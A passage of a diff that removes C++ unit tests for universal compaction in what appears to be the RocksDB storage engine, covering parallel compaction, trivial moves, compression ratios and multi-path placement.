-  compact_options.change_level = true;
-  compact_options.target_level = 4;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  db_->CompactRange(compact_options, nullptr, nullptr);
-  ASSERT_EQ("0,0,0,0,1", FilesPerLevel(0));
-}
-
-
-class DBTestUniversalCompactionMultiLevels
-    : public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalCompactionMultiLevels() :
-      DBTestUniversalCompactionBase(
-          "/db_universal_compaction_multi_levels_test") {}
-};
-
-TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionMultiLevels) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 8;
-  options.max_background_compactions = 3;
-  options.target_file_size_base = 32 * 1024;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 100000;
-  for (int i = 0; i < num_keys * 2; i++) {
-    ASSERT_OK(Put(1, Key(i % num_keys), Key(i)));
-  }
-
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = num_keys; i < num_keys * 2; i++) {
-    ASSERT_EQ(Get(1, Key(i % num_keys)), Key(i));
-  }
-}
-// Tests universal compaction with trivial move enabled
-TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionTrivialMove) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) {
-        non_trivial_move++;
-        ASSERT_TRUE(arg != nullptr);
-        int output_level = *(static_cast<int*>(arg));
-        ASSERT_EQ(output_level, 0);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.allow_trivial_move = true;
-  options.num_levels = 3;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 2;
-  options.target_file_size_base = 32 * 1024;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 150000;
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  std::vector<std::string> values;
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(trivial_move, 0);
-  ASSERT_GT(non_trivial_move, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestUniversalCompactionMultiLevels,
-                        DBTestUniversalCompactionMultiLevels,
-                        ::testing::Combine(::testing::Values(3, 20),
-                                           ::testing::Bool()));
-
-class DBTestUniversalCompactionParallel :
-    public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalCompactionParallel() :
-      DBTestUniversalCompactionBase(
-          "/db_universal_compaction_prallel_test") {}
-};
-
-TEST_P(DBTestUniversalCompactionParallel, UniversalCompactionParallel) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 1 << 10;  // 1KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-  options.max_background_flushes = 3;
-  options.target_file_size_base = 1 * 1024;
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Delay every compaction so multiple compactions will happen.
-  std::atomic<int> num_compactions_running(0);
-  std::atomic<bool> has_parallel(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("CompactionJob::Run():Start",
-                                                 [&](void* arg) {
-    if (num_compactions_running.fetch_add(1) > 0) {
-      has_parallel.store(true);
-      return;
-    }
-    for (int nwait = 0; nwait < 20000; nwait++) {
-      if (has_parallel.load() || num_compactions_running.load() > 1) {
-        has_parallel.store(true);
-        break;
-      }
-      env_->SleepForMicroseconds(1000);
-    }
-  });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():End",
-      [&](void* arg) { num_compactions_running.fetch_add(-1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 30000;
-  for (int i = 0; i < num_keys * 2; i++) {
-    ASSERT_OK(Put(1, Key(i % num_keys), Key(i)));
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(num_compactions_running.load(), 0);
-  ASSERT_TRUE(has_parallel.load());
-
-  for (int i = num_keys; i < num_keys * 2; i++) {
-    ASSERT_EQ(Get(1, Key(i % num_keys)), Key(i));
-  }
-
-  // Reopen and check.
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  for (int i = num_keys; i < num_keys * 2; i++) {
-    ASSERT_EQ(Get(1, Key(i % num_keys)), Key(i));
-  }
-}
-
-TEST_P(DBTestUniversalCompactionParallel, PickByFileNumberBug) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 1 * 1024;  // 1KB
-  options.level0_file_num_compaction_trigger = 7;
-  options.max_background_compactions = 2;
-  options.target_file_size_base = 1024 * 1024;  // 1MB
-
-  // Disable size amplifiction compaction
-  options.compaction_options_universal.max_size_amplification_percent =
-      UINT_MAX;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBTestUniversalCompactionParallel::PickByFileNumberBug:0",
-        "BackgroundCallCompaction:0"},
-       {"UniversalCompactionPicker::PickCompaction:Return",
-        "DBTestUniversalCompactionParallel::PickByFileNumberBug:1"},
-       {"DBTestUniversalCompactionParallel::PickByFileNumberBug:2",
-        "CompactionJob::Run():Start"}});
-
-  int total_picked_compactions = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "UniversalCompactionPicker::PickCompaction:Return", [&](void* arg) {
-        if (arg) {
-          total_picked_compactions++;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Write 7 files to trigger compaction
-  int key_idx = 1;
-  for (int i = 1; i <= 70; i++) {
-    std::string k = Key(key_idx++);
-    ASSERT_OK(Put(k, k));
-    if (i % 10 == 0) {
-      ASSERT_OK(Flush());
-    }
-  }
-
-  // Wait for the 1st background compaction process to start
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0");
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1");
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  // Write 3 files while 1st compaction is held
-  // These 3 files have different sizes to avoid compacting based on size_ratio
-  int num_keys = 1000;
-  for (int i = 0; i < 3; i++) {
-    for (int j = 1; j <= num_keys; j++) {
-      std::string k = Key(key_idx++);
-      ASSERT_OK(Put(k, k));
-    }
-    ASSERT_OK(Flush());
-    num_keys -= 100;
-  }
-
-  // Hold the 1st compaction from finishing
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:2");
-  dbfull()->TEST_WaitForCompact();
-
-  // There should only be one picked compaction as the score drops below one
-  // after the first one is picked.
-  EXPECT_EQ(total_picked_compactions, 1);
-  EXPECT_EQ(TotalTableFiles(), 4);
-
-  // Stop SyncPoint and destroy the DB and reopen it again
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  key_idx = 1;
-  total_picked_compactions = 0;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Write 7 files to trigger compaction
-  for (int i = 1; i <= 70; i++) {
-    std::string k = Key(key_idx++);
-    ASSERT_OK(Put(k, k));
-    if (i % 10 == 0) {
-      ASSERT_OK(Flush());
-    }
-  }
-
-  // Wait for the 1st background compaction process to start
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0");
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1");
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  // Write 8 files while 1st compaction is held
-  // These 8 files have different sizes to avoid compacting based on size_ratio
-  num_keys = 1000;
-  for (int i = 0; i < 8; i++) {
-    for (int j = 1; j <= num_keys; j++) {
-      std::string k = Key(key_idx++);
-      ASSERT_OK(Put(k, k));
-    }
-    ASSERT_OK(Flush());
-    num_keys -= 100;
-  }
-
-  // Wait for the 2nd background compaction process to start
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0");
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1");
-
-  // Hold the 1st and 2nd compaction from finishing
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:2");
-  dbfull()->TEST_WaitForCompact();
-
-  // This time we will trigger a compaction because of size ratio and
-  // another compaction because of number of files that are not compacted
-  // greater than 7
-  EXPECT_GE(total_picked_compactions, 2);
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestUniversalCompactionParallel,
-                        DBTestUniversalCompactionParallel,
-                        ::testing::Combine(::testing::Values(1, 10),
-                                           ::testing::Values(false)));
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionOptions) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 105 << 10;    // 105KB
-  options.arena_block_size = 4 << 10;       // 4KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = num_levels_;
-  options.compaction_options_universal.compression_size_percent = -1;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-    // Write 100KB (100 values, each 1K)
-    for (int i = 0; i < 100; i++) {
-      ASSERT_OK(Put(1, Key(key_idx), RandomString(&rnd, 990)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-    if (num < options.level0_file_num_compaction_trigger - 1) {
-      ASSERT_EQ(NumSortedRuns(1), num + 1);
-    }
-  }
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumSortedRuns(1), 1);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionStopStyleSimilarSize) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 105 << 10;    // 105KB
-  options.arena_block_size = 4 << 10;       // 4KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  options.level0_file_num_compaction_trigger = 4;
-  options.compaction_options_universal.size_ratio = 10;
-  options.compaction_options_universal.stop_style =
-      kCompactionStopStyleSimilarSize;
-  options.num_levels = num_levels_;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Stage 1:
-  //   Generate a set of files at level 0, but don't trigger level-0
-  //   compaction.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    // Write 100KB (100 values, each 1K)
-    for (int i = 0; i < 100; i++) {
-      ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(NumSortedRuns(), num + 1);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-    key_idx++;
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Suppose each file flushed from mem table has size 1. Now we compact
-  // (level0_file_num_compaction_trigger+1)=4 files and should have a big
-  // file of size 4.
-  ASSERT_EQ(NumSortedRuns(), 1);
-
-  // Stage 2:
-  //   Now we have one file at level 0, with size 4. We also have some data in
-  //   mem table. Let's continue generating new files at level 0, but don't
-  //   trigger level-0 compaction.
-  //   First, clean up memtable before inserting new data. This will generate
-  //   a level-0 file, with size around 0.4 (according to previously written
-  //   data amount).
-  dbfull()->Flush(FlushOptions());
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 3;
-       num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 100; i++) {
-      ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(NumSortedRuns(), num + 3);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-    key_idx++;
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Before compaction, we have 4 files at level 0, with size 4, 0.4, 1, 1.
-  // After compaction, we should have 3 files, with size 4, 0.4, 2.
-  ASSERT_EQ(NumSortedRuns(), 3);
-  // Stage 3:
-  //   Now we have 3 files at level 0, with size 4, 0.4, 2. Generate one
-  //   more file at level-0, which should trigger level-0 compaction.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-    key_idx++;
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Level-0 compaction is triggered, but no file will be picked up.
-  ASSERT_EQ(NumSortedRuns(), 4);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionCompressRatio1) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = num_levels_;
-  options.compaction_options_universal.compression_size_percent = 70;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // The first compaction (2) is compressed.
-  for (int num = 0; num < 2; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 110000U * 2 * 0.9);
-
-  // The second compaction (4) is compressed
-  for (int num = 0; num < 2; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 110000 * 4 * 0.9);
-
-  // The third compaction (2 4) is compressed since this time it is
-  // (1 1 3.2) and 3.2/5.2 doesn't reach ratio.
-  for (int num = 0; num < 2; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 110000 * 6 * 0.9);
-
-  // When we start for the compaction up to (2 4 8), the latest
-  // compressed is not compressed.
-  for (int num = 0; num < 8; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_GT(TotalSize(), 110000 * 11 * 0.8 + 110000 * 2);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionCompressRatio2) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = num_levels_;
-  options.compaction_options_universal.compression_size_percent = 95;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // When we start for the compaction up to (2 4 8), the latest
-  // compressed is compressed given the size ratio to compress.
-  for (int num = 0; num < 14; num++) {
-    // Write 120KB (12 values, each 10K)
-    for (int i = 0; i < 12; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 120000U * 12 * 0.8 + 120000 * 2);
-}
-
-// Test that checks trivial move in universal compaction
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest1) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) {
-        non_trivial_move++;
-        ASSERT_TRUE(arg != nullptr);
-        int output_level = *(static_cast<int*>(arg));
-        ASSERT_EQ(output_level, 0);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.allow_trivial_move = true;
-  options.num_levels = 2;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 1;
-  options.target_file_size_base = 32 * 1024;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 250000;
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  std::vector<std::string> values;
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(trivial_move, 0);
-  ASSERT_GT(non_trivial_move, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-// Test that checks trivial move in universal compaction
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest2) {
-  int32_t trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        int output_level = *(static_cast<int*>(arg));
-        ASSERT_EQ(output_level, 0);
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.allow_trivial_move = true;
-  options.num_levels = 15;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 8;
-  options.max_background_compactions = 2;
-  options.target_file_size_base = 64 * 1024;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 500000;
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  std::vector<std::string> values;
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(trivial_move, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionFourPaths) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 300 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 300 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_3", 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_4", 1024 * 1024 * 1024);
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.write_buffer_size = 111 << 10;  // 114KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 1;
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to second path.
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to second path
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1,1,4) -> (2, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 2, 4) -> (3, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 4) -> (8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-
-  // (1, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 1, 8) -> (2, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  // (1, 2, 8) -> (3, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 8) -> (4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-
-  // (1, 4, 8) -> (5, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBTestUniversalCompaction, IncreaseUniversalCompactionNumLevels) {
-  std::function<void(int)> verify_func = [&](int num_keys_in_db) {
-    std::string keys_in_db;
-    Iterator* iter = dbfull()->NewIterator(ReadOptions(), handles_[1]);
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      keys_in_db.append(iter->key().ToString());
-      keys_in_db.push_back(',');
-    }
-    delete iter;
-
-    std::string expected_keys;
-    for (int i = 0; i <= num_keys_in_db; i++) {
-      expected_keys.append(Key(i));
-      expected_keys.push_back(',');
-    }
-
-    ASSERT_EQ(keys_in_db, expected_keys);
-  };
-
-  Random rnd(301);
-  int max_key1 = 200;
-  int max_key2 = 600;
-  int max_key3 = 800;
-  const int KNumKeysPerFile = 10;
-
-  // Stage 1: open a DB with universal compaction, num_levels=1
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 1;
-  options.write_buffer_size = 200 << 10;  // 200KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.memtable_factory.reset(new SpecialSkipListFactory(KNumKeysPerFile));
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (int i = 0; i <= max_key1; i++) {
-    // each value is 10K
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  // Stage 2: reopen with universal compaction, num_levels=4
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 4;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  verify_func(max_key1);
-
-  // Insert more keys
-  for (int i = max_key1 + 1; i <= max_key2; i++) {
-    // each value is 10K
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  verify_func(max_key2);
-  // Compaction to non-L0 has happened.
-  ASSERT_GT(NumTableFilesAtLevel(options.num_levels - 1, 1), 0);
-
-  // Stage 3: Revert it back to one level and revert to num_levels=1.
-  options.num_levels = 4;
-  options.target_file_size_base = INT_MAX;
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  // Compact all to level 0
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 0;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  dbfull()->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-  // Need to restart it once to remove higher level records in manifest.
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  // Final reopen
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 1;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  // Insert more keys
-  for (int i = max_key2 + 1; i <= max_key3; i++) {
-    // each value is 10K
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-  verify_func(max_key3);
-}
-
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionSecondPathRatio) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 1024 * 1024 * 1024);
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.write_buffer_size = 111 << 10;  // 114KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 1;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to second path.
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to second path
-  GenerateNewFile(&rnd, &key_idx);
